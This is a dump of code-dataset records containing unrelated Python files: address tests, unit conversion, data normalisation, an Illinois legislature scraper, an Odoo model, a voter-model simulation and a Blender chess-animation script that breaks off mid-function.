re.match(p.POSTAL_CODE_REGEX[current_locale], result)\n else:\n assert re.match(p.POSTAL_CODE_REGEX['default'], result)\n\n\ndef test_country(address):\n result = address.country()\n assert result in address.data['country']['name']\n\n\n@pytest.mark.parametrize(\n 'fmt, length', [\n ('iso2', 2),\n ('iso3', 3),\n ('numeric', 3),\n ],\n)\ndef test_country_iso(_address, fmt, length):\n iso = _address.country_iso(fmt=fmt)\n\n assert iso in COUNTRIES_ISO[fmt]\n assert len(iso) == length\n\n with pytest.raises(KeyError):\n _address.country_iso(fmt='none')\n\n\ndef test_city(address):\n result = address.city()\n assert result in address.data['city']\n\n\ndef test_continent(address):\n result = address.continent()\n assert result in address.data['continent']\n\n result = address.continent(code=True)\n assert result in CONTINENT_CODES\n\n\ndef test_calling_code(_address):\n result = _address.calling_code()\n assert result is not None\n assert result in CALLING_CODES\n","sub_path":"tests/test_data/test_address.py","file_name":"test_address.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"119648492","text":"powers = list(range(-24, -2, 3)) + list(range(-2, 3, 1)) + list(range(3, 25, 3))\nbases = [10 ** i for i in powers]\nprefixes = (['Ym', 'Zm', 'Em', 'Pm', 'Tm',\n 'Gm', 'Mm', 'km', 'hm', 'dam',\n 'm', 'dm', 'cm', 'mm', 'µm',\n 'nm', 'pm', 'fm', 'am', 'zm', 'ym',])[::-1]\nmetrics = {prefixes[i]: bases[i] for i in range(len(bases))}\n\ndef meters(x):\n ans = ''\n for i, v in metrics.items():\n num = x / v\n if num < 1: break\n if num.is_integer(): num = int(num)\n ans = str(num) + i\n return ans\n\nprint(meters(12300000))","sub_path":"Codewars/replacements.py","file_name":"replacements.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"279642464","text":"# Normalizes the entire input to the neural network\n\nimport csv\nimport os\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\ncwd = os.getcwd()\ndata_csv_path = os.path.join(cwd,'data.csv')\n\n# check if the folder at the given file path exists and make it if it does not\ndef ensure_dir(file_path):\n # directory = os.path.dirname(file_path)\n directory = file_path\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\n\ndataset = pd.read_csv(data_csv_path).values\n\n### get all the data file names\nX = dataset[:,0]\nY = dataset[:,1]\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y,test_size=0.2)\n\nmean_X = []\nmin_X = []\nmax_X = []\n\ndata_path = os.path.join(cwd,'data')\ndata_path_norm = os.path.join(cwd,'data_norm')\nensure_dir(data_path_norm) # create a folder to store the normalised data if it doesn't exist\n\n\n## find the max and min in the data\nfor file in X:\n X_entry = np.load(data_path+'/'+file)\n max_X.append(np.amax(X_entry))\n min_X.append(np.amin(X_entry))\n\nmax_data = max(max_X)\nmin_data = min(min_X)\n\n\ntotal_length = 0\n\n\n## compute the mean of the data\nfor file in X:\n X_entry = np.load(data_path+'/'+file)\n X_entry_norm = ((X_entry - min_data))/(max_data - min_data)\n mean_X.append(np.sum(X_entry_norm))\n total_length = total_length + X_entry.size\n\nmean_data = np.sum(mean_X)/float(total_length)\n\nensure_dir(data_path_norm)\n\n## normalise the data and store it\nfor file in X :\n X_entry = np.load(data_path+'/'+file)\n X_entry_norm = ((X_entry - min_data))/(max_data - min_data)\n X_entry_norm = X_entry_norm - mean_data\n np.save(data_path_norm+'/'+file,X_entry_norm)\n\n\n","sub_path":"Polyphonic Note Extraction /RNN-LSTM/normalize.py","file_name":"normalize.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"119665431","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 28 14:16:44 2017\n\n@author: Mikey\n\"\"\"\nfrom urllib.request import urlopen\nfrom urllib.error import HTTPError\nfrom bs4 import BeautifulSoup\nfrom time import sleep\nimport re\nimport pdb\nimport databaseSQL as db\n\ndataSen = db.database('senators')\ndataBill = db.database('bills')\ndataHouse = db.database('house')\n\nclass Senator():\n def __init__(self, name, url, comUrl, billUrl, affiliation, district):\n self.name = name\n self.url = url\n self.comUrl = comUrl\n self.billUrl = billUrl\n self.affiliation = affiliation\n self.district = district\n self.committees = {}\n self.bills = []\n \n def addCommittees(self):\n self.committees = getCommittees(self.comUrl, self.name)\n \n def committeeNames(self):\n return self.committees.keys()\n \n def sponsoredBills(self):\n self.bills = getBills(self.billUrl)\n \n def billNames(self):\n return self.bills\n \nclass Bill():\n def __init__(self, name, url, sponsor, description, chamber, action, actionDate, senateSponsors, houseSponsors):\n self.name = name\n self.url = url\n self.sponsor = sponsor\n self.description = description\n self.chamber = chamber\n self.action = action\n self.actionDate = actionDate\n self.senateSponsors = senateSponsors\n self.houseSponsors = houseSponsors\n\ndef getBSObject(url):\n \"\"\"\n Prevents errors when looking up webpage\n \"\"\"\n try:\n html = urlopen(url)\n except HTTPError as e:\n return None\n try:\n bsObject = BeautifulSoup(html.read(), \"lxml\")\n except AttributeError as e:\n return None\n return bsObject\n\ndef getSenators():\n curGA= \"http://www.ilga.gov/senate/default.asp\"\n web = getBSObject(curGA)\n table = web.find(\"table\", {\"width\":\"490\"})\n senatorList = []\n for i in table.table.children:\n senatorList.append(i)\n \n for a in senatorList:\n if a == '\\n':\n senatorList.remove(a)\n del senatorList[0]\n del senatorList[0] \n \n govUrl = \"http://www.ilga.gov/senate/\"\n senUrl = \"http://www.ilga.gov\"\n senators = []\n for sen in senatorList:\n temp = sen.findAll('a')\n tempTD = sen.findAll('td')\n senators.append(Senator(temp[0].get_text(), senUrl +temp[0].attrs['href'],\n govUrl + temp[2].attrs['href'], \n govUrl + temp[1].attrs['href'],\n tempTD[4].get_text(), tempTD[3].get_text()))\n temp.clear()\n tempTD.clear()\n \n return senators\n\ndef getHouse():\n curHouseUrl = \"http://www.ilga.gov/house/\"\n web = getBSObject(curHouseUrl)\n table = web.find(\"table\", {\"width\":\"490\"})\n houseList = []\n for i in table.table.children:\n houseList.append(i)\n for a in houseList:\n if a == '\\n':\n houseList.remove(a)\n del houseList[0]\n del houseList[0]\n govUrl = \"http://www.ilga.gov/house/\"\n houseUrl = \"http://www.ilga.gov\"\n house = []\n for hou in houseList:\n temp = hou.findAll('a')\n tempTD = hou.findAll('td')\n house.append(Senator(temp[0].get_text(), houseUrl +temp[0].attrs['href'],\n govUrl + temp[2].attrs['href'], \n govUrl + temp[1].attrs['href'],\n tempTD[4].get_text(), tempTD[3].get_text()))\n temp.clear()\n tempTD.clear()\n return house\n\ndef getCommittees(urlC, repName):\n bs = getBSObject(urlC)\n tab = bs.find(\"table\", {\"cellpadding\":\"3\"})\n coms = []\n for i in tab.children:\n coms.append(i)\n for a in coms:\n if a == '\\n':\n coms.remove(a)\n del coms[0]\n comDict = {}\n leader = False\n for a in coms:\n try:\n if repName == a.td.next_sibling.next_sibling.find('a').get_text():\n leader = True\n else:\n leader = False\n except AttributeError as e:\n print(e)\n leader = False\n comDict[a.td.get_text().strip()] = leader\n return comDict\n \n#Now returns a list of bills the representative is part of and adds the bill\n#and bill details to a database \ndef getBills(representative):\n bs = getBSObject(representative)\n tab = bs.find(\"table\", {\"cellpadding\":\"3\"})\n genUrl = \"http://www.ilga.gov\"\n biList = []\n billNames = []\n for i in tab.children:\n biList.append(i)\n for a in biList:\n if a == '\\n':\n biList.remove(a) \n del biList[0]\n #Doesn't rescrape bills already in database\n for a in biList:\n b = a.findAll(\"td\")\n if dataBill.__contains__(b[0].get_text()) is False:\n billUrl = genUrl + b[0].find('a').attrs['href']\n sleep(1)\n billSoup = getBSObject(billUrl)\n try:\n bill = Bill(b[0].get_text(),\n billUrl,\n b[1].get_text(),\n b[2].get_text(),\n b[3].get_text(),\n b[4].get_text(),\n b[5].get_text(),\n billSponsors(billSoup.findAll('a', {'class':'content'}), \"senate\"),\n billSponsors(billSoup.findAll('a',{'class':'content'}), \"house\"))\n billNames.append(b[0].get_text())\n dataBill[b[0].get_text()] = bill\n print(\"Added: \" + b[0].get_text()) \n except KeyError as e:\n print(e)\n else:\n billNames.append(b[0].get_text())\n print(\"Already contains: \" + b[0].get_text())\n return billNames\n \n \n\ndef billSponsors(bill, sponsor):\n pattern = re.compile(\"\\/senate\\/+\")\n repList = []\n if sponsor == 'senate':\n for b in bill:\n if re.match(pattern, b.attrs['href'][0:8]):\n repList.append(b.get_text())\n else:\n return repList\n else:\n for b in bill:\n if re.match(pattern, b.attrs['href'][0:8]):\n continue\n else:\n repList.append(b.get_text())\n return repList\n\ndef scrape_senators():\n sen = getSenators()\n for x in range(0, len(sen)):\n #pdb.set_trace()\n senator = sen[x]\n #If connection times out and have to restart the scrape\n if dataSen.__contains__(senator.name) is False:\n print(senator.name)\n senator.sponsoredBills()\n senator.addCommittees()\n print(\"Received bills and committees\")\n dataSen[senator.name] = senator\n #prevent overuse on ilga\n sleep(1)\n else: \n print(\"Already contains: \" + senator.name)\n #garbage collection - regular for loop for s in sen was acting fishy\n del senator\n \ndef scrape_house():\n house = getHouse()\n for x in range(0, len(house)):\n rep = house[x]\n if dataHouse.__contains__(rep.name) is False:\n print(rep.name)\n rep.sponsoredBills()\n rep.addCommittees()\n print(\"Received bills and committees\")\n dataHouse[rep.name] = rep\n sleep(2)\n else:\n print(\"Already contains: \" + rep.name)\n del rep\n \n \n ","sub_path":"senate.py","file_name":"senate.py","file_ext":"py","file_size_in_byte":7429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"470764563","text":"from odoo import models, fields\nfrom odoo import api\n\nclass StudentInfo(models.Model):\n _name = \"student.information\"\n\n country = [\n (\"india\", \"India\"),\n (\"america\", \"America\"),\n (\"london\", \"London\"),\n (\"china\", \"China\"),\n ]\n status = [\n (\"draft\", \"Draft\"),\n (\"approved\", \"Approved\"),\n (\"cancel\", \"Cancel\"),\n ]\n name = fields.Char()\n Email = fields.Char()\n Mobile = fields.Char()\n Country_id = fields.Many2one(\"res.country\")\n state = fields.Selection(status)\n edu_ids = fields.One2many(\"education.detail\", \"stu_id\")\n login_user=fields.Many2one(\"res.users\",default=lambda self:self.env.user)\n \n\n def draft_action(self):\n print(f\"\\n\\n\\n\\nhi draft\")\n for rec in self:\n rec.write({'state': 'draft'})\n\n def approved_action(self):\n print(f\"\\n\\n\\n\\nhi approved\")\n for rec in self:\n rec.write({'state': 'approved'})\n\n def cancel_action(self):\n print(f\"\\n\\n\\n\\nhi cancel\")\n for rec in self:\n rec.write({'state': 'cancel'})\n\n def reset_action(self):\n print(f\"\\n\\n\\n\\nhi reset\")\n for rec in self:\n rec.write({'state': 'draft'})\n","sub_path":"custom_addons/student_info/models/student_info.py","file_name":"student_info.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"592682934","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 26 16:50:19 2018\n\n@author: user\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\ndef get_data():\n # read and store the data\n df=pd.read_csv('ecommerce_data.csv')\n # convert the data into a numpy matrix\n data=df.as_matrix()\n # split the data into dependent variable vector and feature matrix\n X=data[:, :-1]\n Y=data[:, -1]\n # normalize the numerical columns\n X[:, 1]=(X[:, 1]-X[:, 1].mean())/X[:, 1].std()\n X[:, 2]=(X[:, 2]-X[:, 2].mean())/X[:, 2].std()\n # get the dimentions of the feature matrix\n num_of_observations, dimension=X.shape\n # convert the categorical values into numerical values \n # while avoiding the dummy variable trap (we have 4 categorical values, \n # so we will have 3 columns for the converted categories)\n X2=np.zeros((num_of_observations, dimension+3))\n X2[:, 0:(dimension-1)]=X[:, 0:(dimension-1)]\n # apply one hot encoding for the categorical columns\n for n in range(num_of_observations):\n # get the categorical value (time of day) for each entry\n t=int(X[n, dimension-1])\n X2[n, t+dimension-1]=1\n return X2, Y\n\n# for the binary classification we will select only the classes 0 and 1\ndef get_binary_data():\n X, Y=get_data()\n X2=X[Y<=1]\n Y2=Y[Y<=1]\n return X2, Y2","sub_path":"e comm project/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"276730339","text":"def alternatingCharacters(s):\n # Assigning the first character of the string as the initial check string\n check = s[0]\n\n # Assigning the initial check index 'j' and the initial counter\n j = 0\n counter = 0\n\n # Looping through each character pf the string, excluding the first one\n # since it is already assigned to the check as our reference\n for i in range(1, len(s)):\n # Checking i the current character of the string matches the last character in the check\n if s[i] != check[j]:\n # If it does, the character is appended to the check string and its index is incremented by 1\n check += s[i]\n j += 1\n # Otherwise the counter gets incremented by 1 since this would mean that a\n # character gets deleted in order to keep the alternation in the string\n else:\n counter += 1\n\n # Returning the number of deletions\n return counter\n\n\n# Test\nstring = 'AAABBBAABB'\n\nprint(alternatingCharacters(string))\n","sub_path":"String Manipulation/Alternating Characters/alternatingcharacters_solution.py","file_name":"alternatingcharacters_solution.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"617871254","text":"import grid_model\nimport random\n\nclass VoterModel(grid_model.GridModel):\n __fullname__ = 'Voter Model'\n\n def __init__(self):\n super().__init__()\n self.size = 0\n self.set_timer_speed(500)\n\n def handle_property_change(self, prop, value):\n if prop == 'size':\n self._grid(value)\n elif prop == 'probability':\n self._grid(self.size, prob=value)\n\n def _grid(self, size, prob=None):\n if size <= 0:\n raise ValueError('invalid forest size')\n self.size = size\n\n if prob is not None:\n self.prob = prob\n self.create_grid(size, size, initial_state= lambda row, col: {\n 'color': 'black' if random.random() < self.prob else 'white'\n })\n\n def create(self):\n size = 50\n speed = 0.1\n prob = 0.5\n\n self.add_property('size', 'Grid Size', size, [1, 100], 1)\n self.add_property('probability', 'Probability', prob, [0, 1], 'any')\n self.add_property('speed', 'Speed', speed, [0, 1], 'any')\n\n self._grid(size, prob=prob)\n self.set_speed(speed)\n\n def set_speed(self, speed):\n self.speed = speed\n self.set_timer_speed(1000 - speed * 1000)\n\n def reset(self):\n self._grid(self.size, prob=self.prob)\n\n def tick(self):\n # choose random agent\n row = random.randrange(0, self.size)\n col = random.randrange(0, self.size)\n\n # choose random neighbor\n all_neighs = self.get_cell_neighbors(row, col)\n neigh = random.sample(all_neighs, 1)[0]\n\n # copy state\n self.set_agent_state(row, col, self.get_agent_state(*neigh))\n\n def get_agent_state(self, row, col):\n return 1 if self.get_cell_attribute(row, col, 'color') == 'black' else 0\n\n def set_agent_state(self, row, col, state):\n color = None\n if state == 1:\n color = 'white'\n elif state == 0:\n color = 'black'\n if color is None:\n raise ValueError('invalid state: {0}'.format(color))\n self.notify_cell_state(row, col, color=color)\n\n def reset(self):\n self._grid(self.size, prob=self.prob)\n","sub_path":"client_python/models/voter.py","file_name":"voter.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"1838087","text":"\nEXIT_CODES = {\n 'OK': 0,\n 'UNKNOWN': -1,\n 'CHESS_FRACTURE_TEST_FAIL': 1,\n 'SIMULATION_FAILED': 2,\n 'MISSING_DEPENDENCY': 3,\n 'PGN_LOAD_FAILED': 4,\n 'UNSUPPORTED_VARIANT': 5,\n 'SAVE_FAILED': 6,\n}\n\n\nfrom io import StringIO\n\nimport os\nfrom os import path\nimport sys\nfrom pprint import pprint\nimport time\nimport re\nimport traceback\nfrom math import pi\n\nimport bpy\nimport bmesh\nfrom mathutils.bvhtree import BVHTree\n\ntry:\n import chess.pgn\nexcept Exception as e:\n print('chess module missing (pip install python-chess?)')\n traceback.print_exc()\n sys.exit(EXIT_CODES['MISSING_DEPENDENCY'])\n\n\n# square size in blender units\nSQUARE_SIZE = 3.0\n\n# center of gravity for the pieces\nZ_MAP = {\n 'king': 2.32912,\n 'queen': 2.0401,\n 'bishop': 1.1886,\n 'knight': 1.4525,\n 'rook': 1.46252,\n 'pawn': 1.35288,\n}\n\n\ndef chess_to_coordinates(row, col, z):\n x_map = {'a': 0., 'b': 1., 'c': 2., 'd': 3., 'e': 4., 'f': 5., 'g': 6., 'h': 7.}\n y_map = {'1': 0., '2': 1., '3': 2., '4': 3., '5': 4., '6': 5., '7': 6., '8': 7.}\n \n return (x_map[row] + 0.5) * SQUARE_SIZE, (y_map[col] + 0.5) * SQUARE_SIZE, z\n\n\ndef clean():\n for action in bpy.data.actions:\n if action.users == 0:\n bpy.data.actions.remove(action)\n for mesh in bpy.data.meshes:\n if mesh.users == 0:\n bpy.data.meshes.remove(mesh)\n\n\ndef instantiate_piece(piece_name, player, board_location, z, name=None):\n col, row = board_location\n src_obj = bpy.context.scene.objects['template_' + piece_name]\n\n new_obj = src_obj.copy()\n new_obj.data = src_obj.data.copy()\n new_obj.animation_data_clear()\n\n if name:\n new_obj.name = name\n else:\n new_obj.name = piece_name + '.' + player + '.' + col + row\n \n bpy.context.scene.collection.objects.link(new_obj)\n new_obj.location = chess_to_coordinates(col, row, z)\n\n if player == 'black':\n new_obj.rotation_euler[2] += pi\n\n new_obj.keyframe_insert(data_path='location')\n\n print('Instantiating ' + str(new_obj.name) + ' for ' + str(player) + ' at ' + str(new_obj.location))\n \n # physics\n bpy.data.scenes['Scene'].rigidbody_world.collection.objects.link(new_obj)\n\n return new_obj\n\n\ndef check_object_intersects(a, b):\n '''\n Checks if 2 objects meshes intersects\n https://blender.stackexchange.com/questions/71289/using-overlap-to-check-if-two-meshes-are-intersecting\n '''\n\n bmA = bmesh.new()\n bmB = bmesh.new()\n\n #fill bmesh data from objects\n bmA.from_mesh(a.data)\n bmB.from_mesh(b.data)\n #fixed it here:\n bmA.transform(a.matrix_world)\n bmB.transform(b.matrix_world)\n #make BVH tree from BMesh of objects\n bvhA = BVHTree.FromBMesh(bmA)\n bvhB = BVHTree.FromBMesh(bmB)\n #get intersecting pairs\n inter = bvhA.overlap(bvhB)\n #if list is empty, no objects are touching\n return inter\n\n\ndef initial_setup():\n # remove old meshes\n clean()\n \n # remove stuff\n bpy.ops.object.select_all(action='SELECT')\n for o in filter(lambda x: x.name.startswith('template_'), bpy.data.objects):\n o.select_set(False)\n bpy.ops.object.delete()\n\n \n bpy.context.scene.frame_set(1)\n bpy.context.scene.frame_end = 3000\n \n\n #bpy.ops.rigidbody.world_add()\n \n \n board_map = {}\n # PAWNS\n piece_name = 'pawn'\n for idx1, col in enumerate(\"abcdefgh\"):\n for idx2, row in enumerate(\"27\"):\n board_location = (col, row)\n if int(row) < 4:\n player = 'white'\n else:\n player = 'black'\n new_obj = instantiate_piece(piece_name, player, board_location, Z_MAP[piece_name])\n board_map[col + row] = new_obj\n\n # ROOKS\n piece_name = 'rook'\n for idx1, col in enumerate(\"ah\"):\n for idx2, row in enumerate(\"18\"):\n if int(row) < 4:\n player = 'white'\n else:\n player = 'black'\n board_location = (col, row)\n new_obj = instantiate_piece(piece_name, player, board_location, Z_MAP[piece_name])\n board_map[col + row] = new_obj\n # KNIGHTS\n piece_name = 'knight'\n for idx1, col in enumerate(\"bg\"):\n for idx2, row in enumerate(\"18\"):\n if int(row) < 4:\n player = 'white'\n else:\n player = 'black'\n board_location = (col, row)\n new_obj = instantiate_piece(piece_name, player, board_location, Z_MAP[piece_name])\n board_map[col + row] = new_obj\n # BISHOPS\n piece_name = 'bishop'\n for idx1, col in enumerate(\"cf\"):\n for idx2, row in enumerate(\"18\"):\n if int(row) < 4:\n player = 'white'\n else:\n player = 'black'\n board_location = (col, row)\n new_obj = instantiate_piece(piece_name, player, board_location, Z_MAP[piece_name])\n board_map[col + row] = new_obj\n # QUEENS\n piece_name = 'queen'\n for idx1, col in enumerate(\"d\"):\n for idx2, row in enumerate(\"18\"):\n if int(row) < 4:\n player = 'white'\n else:\n player = 'black'\n board_location = (col, row)\n new_obj = instantiate_piece(piece_name, player, board_location, Z_MAP[piece_name])\n board_map[col + row] = new_obj\n # KINGS\n piece_name = 'king'\n for idx1, col in enumerate(\"e\"):\n for idx2, row in enumerate(\"18\"):\n if int(row) < 4:\n player = 'white'\n else:\n player = 'black'\n board_location = (col, row)\n new_obj = instantiate_piece(piece_name, player, board_location, Z_MAP[piece_name])\n board_map[col + row] = new_obj\n \n # BOARD \n bpy.ops.mesh.primitive_plane_add(enter_editmode=False, location=(0, 0, 0))\n bpy.context.selected_objects[0].name = 'ground'\n \n bpy.context.object.scale[1] = 4 * SQUARE_SIZE\n bpy.context.object.scale[0] = 4 * SQUARE_SIZE\n bpy.context.object.location[0] = 4 * SQUARE_SIZE\n bpy.context.object.location[1] = 4 * SQUARE_SIZE\n\n bpy.data.scenes['Scene'].rigidbody_world.collection.objects.link(bpy.data.objects['ground'])\n\n # TODO: create checker texture\n checker_mat = bpy.data.materials.get('checker')\n bpy.data.objects['ground'].data.materials.append(checker_mat)\n\n bpy.context.scene.frame_set(2)\n bpy.context.scene.frame_set(3)\n bpy.context.scene.frame_set(1)\n \n bpy.data.objects['ground'].rigid_body.kinematic = True\n for piece in board_map.values():\n piece.rigid_body.kinematic = True\n\n\n return board_map\n \n\n\ndef load_pgn(pgn_path):\n print(\"Loading PGN \" + str(pgn_path))\n try:\n with open(pgn_path) as pgn_file:\n game = chess.pgn.read_game(pgn_file)\n except Exception as e:\n print(\"Load PGN failed\")\n traceback.print_exc()\n sys.exit(EXIT_CODES['PGN_LOAD_FAILED'])\n \n return game\n \n\ndef fracture(obj, n_fragments, current_frame):\n bpy.ops.object.select_all(action='DESELECT')\n obj.select_set(True)\n bpy.ops.object.add_fracture_cell_objects(source_limit=n_fragments)\n \n for o in filter(lambda x: x.name.startswith(obj.name + '_cell'), bpy.data.objects):\n bpy.data.scenes['Scene'].rigidbody_world.collection.objects.link(o)\n\n bpy.context.scene.frame_set(1)\n bpy.context.scene.frame_set(2)\n bpy.context.scene.frame_set(current_frame)\n \n for o in filter(lambda x: x.name.startswith(obj.name + '_cell'), bpy.data.objects):\n print('enable rigid_body.kinematic for ' + str(o))\n o.rigid_body.kinematic = True\n o.keyframe_insert('rigid_body.kinematic')\n\n # disable old piece\n for o in bpy.data.objects:\n o.select_set(False)\n obj.select_set(True)\n\n # needed or obj.rigid_body is None\n bpy.context.scene.frame_set(0)\n bpy.context.scene.frame_set(1)\n bpy.context.scene.frame_set(2)\n bpy.context.scene.frame_set(0)\n\n obj.rigid_body.collision_collections[0] = True\n obj.keyframe_insert('rigid_body.collision_collections')\n obj.hide_viewport = False\n obj.keyframe_insert('hide_viewport')\n obj.hide_render = False\n obj.keyframe_insert('hide_render')\n \n bpy.context.scene.frame_set(current_frame - 1)\n obj.rigid_body.collision_collections[0] = False\n obj.keyframe_insert('rigid_body.collision_collections')\n obj.hide_viewport = True\n obj.keyframe_insert('hide_viewport')\n obj.hide_render = True\n obj.keyframe_insert('hide_render')\n \n # enable rigid body for cells\n bpy.context.scene.frame_set(current_frame - 1)\n for o in filter(lambda x: x.name.startswith(obj.name + '_cell'), bpy.data.objects):\n o.rigid_body.kinematic = True\n o.keyframe_insert('rigid_body.kinematic')\n o.rigid_body.collision_collections[0] = False\n o.keyframe_insert('rigid_body.collision_collections')\n bpy.context.scene.frame_set(current_frame)\n for o in filter(lambda x: x.name.startswith(obj.name + '_cell'), bpy.data.objects):\n o.rigid_body.kinematic = False\n o.keyframe_insert('rigid_body.kinematic')\n o.rigid_body.collision_collections[0] = True\n o.keyframe_insert('rigid_body.collision_collections')\n \n # hide/unhide\n bpy.context.scene.frame_set(0)\n for o in filter(lambda x: x.name.startswith(obj.name + '_cell'), bpy.data.objects):\n o.hide_viewport = True\n o.keyframe_insert('hide_viewport')\n o.hide_render = True\n o.keyframe_insert('hide_render')\n bpy.context.scene.frame_set(current_frame - 1)\n for o in filter(lambda x: x.name.startswith(obj.name + '_cell'), bpy.data.objects):\n o.hide_viewport = False\n o.keyframe_insert('hide_viewport')\n o.hide_render = False\n o.keyframe_insert('hide_render')\n\n\ndef play(board_map, game, frames_per_move, n_fragments):\n start_time = time.time()\n\n board = game.board()\n for move_number, move in enumerate(game.mainline_moves()):\n from_square = move.uci()[0:2]\n to_square = move.uci()[2:4]\n \n is_capture = board.is_capture(move)\n is_castling = board.is_castling(move)\n is_kingside_castling = board.is_kingside_castling(move)\n is_queenside_castling = board.is_queenside_castling(move)\n is_en_passant = board.is_en_passant(move)\n promotion = move.promotion\n \n print('{}: {}, cap: {}, castl: {}, promot: {}'.format((move_number // 2) + 1, move, is_capture, is_castling, promotion))\n\n\n if is_castling:\n king = board_map[from_square]\n \n if to_square == 'g1':\n rook_from = 'h1'\n rook_dest = 'f1'\n elif to_square == 'c1':\n rook_from = 'a1'\n rook_dest = 'd1'\n elif to_square == 'g8':\n rook_from = 'h8'\n rook_dest = 'f8'\n elif to_square == 'c8':\n rook_from = 'a8'\n rook_dest = 'd8'\n rook = board_map[rook_from]\n \n # insert keyframes\n king.keyframe_insert(data_path='location')\n rook.keyframe_insert(data_path='location')\n \n bpy.context.scene.frame_set(bpy.context.scene.frame_current + frames_per_move)\n \n # move king\n king.location = chess_to_coordinates(to_square[0], to_square[1], king.location.z)\n king.keyframe_insert(data_path='location')\n \n # move rook\n rook.location = chess_to_coordinates(rook_dest[0], rook_dest[1], rook.location.z)\n rook.keyframe_insert(data_path='location')\n \n # update board\n board_map.pop(from_square)\n board_map.pop(rook_from)\n \n board_map[to_square] = king\n board_map[rook_dest] = rook\n \n # end if castling\n elif is_capture:\n # keyframe for previous position\n board_map[from_square].keyframe_insert(data_path='location')\n board_map[to_square].keyframe_insert('rigid_body.kinematic')\n \n # WTF was that?\n #bpy.context.scene.frame_set(bpy.context.scene.frame_current + 1)\n #board_map[to_square].rigid_body.kinematic = False\n #board_map[to_square].keyframe_insert('rigid_body.kinematic')\n #bpy.context.scene.frame_set(bpy.context.scene.frame_current - 1)\n \n current_frame = bpy.context.scene.frame_current\n \n # timestep\n bpy.context.scene.frame_set(current_frame + frames_per_move)\n # move piece\n board_map[from_square].location = chess_to_coordinates(to_square[0], to_square[1], board_map[from_square].location.z)\n board_map[from_square].keyframe_insert(data_path='location')\n \n # change interpolation method (need to be done before computing the collision instant)\n piece_re = re.compile(r'.*[a-h]\\d$')\n for o in bpy.data.objects:\n if piece_re.match(o.name) and hasattr(o.animation_data, 'action'):\n fcurves = o.animation_data.action.fcurves\n\n print('curve: ' + str(o.name))\n for fcurve in fcurves:\n for kf in fcurve.keyframe_points:\n kf.interpolation = 'SINE'\n\n # find collison frame\n print('Looking for collision...')\n collision_frame = 0\n for i in range(frames_per_move):\n bpy.context.scene.frame_set(current_frame + i)\n flag = check_object_intersects(board_map[from_square], board_map[to_square])\n print('i={}: {}'.format(i, len(flag)))\n if flag:\n print('Collision on frame {}'.format(bpy.context.scene.frame_current))\n collision_frame = bpy.context.scene.frame_current\n break\n\n fracture(board_map[to_square], n_fragments, collision_frame)\n \n \n # play the move on the board_map\n board_map[to_square] = board_map[from_square]\n board_map.pop(from_square)\n\n # end if capture\n else:\n # simple move\n # keyframe for previous position\n board_map[from_square].keyframe_insert(data_path='location')\n \n # timestep\n bpy.context.scene.frame_set(bpy.context.scene.frame_current + frames_per_move)\n \n # move piece\n board_map[from_square].location = chess_to_coordinates(to_square[0], to_square[1], board_map[from_square].location.z)\n board_map[from_square].keyframe_insert(data_path='location')\n \n # play the move on board\n board_map[to_square] = board_map[from_square]\n board_map.pop(from_square)\n\n # end simple move\n\n if promotion:\n TURN_COLOR_MAP = { True: 'white', False: 'black' }\n player = TURN_COLOR_MAP[board.turn]\n\n promoted_piece_name = chess.PIECE_NAMES[promotion]\n print('Promoted to: ' + str(promoted_piece_name))\n\n (col, row) = (to_square[0], to_square[1])\n z = Z_MAP[promoted_piece_name] - 10.\n promoted_piece = instantiate_piece(promoted_piece_name, player, (col, row), z, name='{}.{}.promoted.{}{}'.format(promoted_piece_name, player, col, row))\n\n print('promoted piece = ' + str(promoted_piece_name) + ', at ' + str((col, row)))\n pawn = board_map[col + row]\n print('promotion pawn = ' + str(pawn))\n \n # disable physics and display for promoted piece from #0 to #current_frame\n current_frame = bpy.context.scene.frame_current\n\n # otherwise promoted_piece.rigid_body == None\n bpy.context.scene.frame_set(2)\n bpy.context.scene.frame_set(3)\n bpy.context.scene.frame_set(1)\n bpy.context.scene.frame_set(current_frame - 1)\n\n promoted_piece.rigid_body.kinematic = True\n promoted_piece.keyframe_insert('rigid_body.kinematic')\n promoted_piece.rigid_body.collision_collections[0] = True\n promoted_piece.keyframe_insert('rigid_body.collision_collections')\n promoted_piece.hide_viewport = True\n promoted_piece.keyframe_insert('hide_viewport')\n promoted_piece.hide_render = True\n promoted_piece.keyframe_insert('hide_render')\n \n # promoted piece appears on #current_frame\n bpy.context.scene.frame_set(current_frame)\n promoted_piece.rigid_body.collision_collections[0] = True\n promoted_piece.keyframe_insert('rigid_body.collision_collections')\n promoted_piece.hide_viewport = False\n promoted_piece.keyframe_insert('hide_viewport')\n promoted_piece.hide_render = False\n promoted_piece.keyframe_insert('hide_render')\n\n # distroy pawn\n fracture(pawn, n_fragments, current_frame)\n\n # animate promoted piece?\n current_frame += frames_per_move\n bpy.context.scene.frame_set(current_frame)\n promoted_piece.location[2] += 10.\n promoted_piece.keyframe_insert(data_path='location')\n\n # update board_map\n board_map[to_square] = promoted_piece\n\n # update the board\n board.push(move)\n \n if 